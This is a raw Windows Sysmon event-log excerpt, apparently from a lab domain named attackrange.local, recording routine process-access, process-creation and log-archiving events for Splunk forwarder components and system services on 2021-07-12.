08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810327Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810326Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810325Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:26.912{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F83E-60EB-E079-00000000D001}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810324Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.912{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F83E-60EB-E079-00000000D001}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810323Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.897{0C1E0330-F83E-60EB-E079-00000000D001}2556C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810322Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.662{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35131BDE4492473F9F6C2C9D6814C826,SHA256=E7F5AEB7CF6832AD713F459CDAAC407BE1F5C2A4E4ACC14C034D1C3D6DFE3DF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810321Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.662{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E51715FBC09282897120AE5B1A3C781D,SHA256=8608182D78B91B47E880638A17DC1E45055839035AA8944BCBE6F3D28C979FCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810320Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.225{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F83E-60EB-DF79-00000000D001}2664C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810319Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810318Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810317Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810316Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810315Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810314Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810313Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810312Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:26.225{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810311Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.209{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810310Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:26.209{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F83E-60EB-DF79-00000000D001}2664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810309Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.209{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F83E-60EB-DF79-00000000D001}2664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810308Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:26.210{0C1E0330-F83E-60EB-DF79-00000000D001}2664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810353Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D51B6CB11BA4D143182C4FE7E880B982,SHA256=BF6BCF773AD31D4F0BC4CACF5CD0E02A344788A943C623EEC87D0F3616795E18,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810352Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.818{0C1E0330-F83F-60EB-E179-00000000D001}904936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810351Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.803{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2820B89622C65C357C0C8F547ED1CB81,SHA256=BB5F61A0BDD0AAD79CD43A2A2C6D88BA84CA9CF70137D67D4D3B4F20F4C1EB89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:27.568{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=791BF8884A4C8C3D4C3D8B6C80067C2F,SHA256=0C9185719BDAC01AE4E26955F82007900DAD3DFB3687F69149FE5FE5B4EC1793,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810350Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F83F-60EB-E179-00000000D001}904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810349Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810348Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810347Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:07:27.600{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810346Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 